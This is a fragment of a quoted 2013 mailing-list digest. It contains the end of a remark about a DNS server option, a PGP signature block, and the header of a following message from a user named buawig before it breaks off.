>>> on the DNS server with --dns-domain (but without -u) doing that job.
>>>
>>> -----BEGIN PGP SIGNATURE-----
>>>
>>> iQIcBAEBCgAGBQJRbcIPAAoJEJeRHQyF0ukM/VwQAKlZKRyuk55ZbiOzbRPztw/p
>>> dGHg7KLwPJ5fM9uXDNodO7cdZF18x6EJOjTJwu6sRNvUwjiAWb7VwAB6HLcts8Qf
>>> WXQL5OUBEzJiYJ/XUVZonPvw+PGc781rNTJDnbW3RKSQK8Hd7T5TgfDE0ucqTCRz
>>> cJ1NbcDswrCQNZtKr09SRW9kxk1QfHsbAGfQYpQh0LrIR3cTageFPLJ+hosMF+VU
>>> uoEiu6k9JJwbWlKCMu2uz/UrLRqdt7VtjhkpbLSLMBL/IOnfTHfdQ37NRYcJIkos
>>> D/sZIyA0MT/woN25rVVDAhxwVZ2MFcxn7eMKXZCxv5VpXZKQxeMtew8maDBwom5C
>>> JdM+bF6AoE56zqi/+qaYajPmO0GYQXy26YUhbRJUufF2ThSTTWnmgZ8QH6fKUbfN
>>> QTGbXyH/FbaXDMDokEButCcrD1PCpvklfz44VU7zi0zG/wBN+mnleT24bvW1tbhx
>>> J1vCEbXWEFCfxwCqTDopLHaGNkIlo4oH4PUsIyW1FlTYQRqH5cUe2bV1F0XcP3/O
>>> yNyHZmLMGtPdEvJ+Wkx8Bp4gcUC2ikKlS6H85TMDu6GxS5oi7EK+kGnJ+njhPeaF
>>> plSWWJFQHEm0DJ/ZCGjgzZyvS8QzK7WDfplpR/TBrc3uOLXZVqDhPW4IkLLc49Vz
>>> N5xHRCVPLLSrPfTPiyIJ
>>> =JSkD
>>> -----END PGP SIGNATURE-----
>>>
>>>
>>>
>>> ------------------------------
>>>
>>> Message: 11
>>> Date: Tue, 16 Apr 2013 23:24:23 +0200
>>> From: buawig <bua...
[truncated message content] |
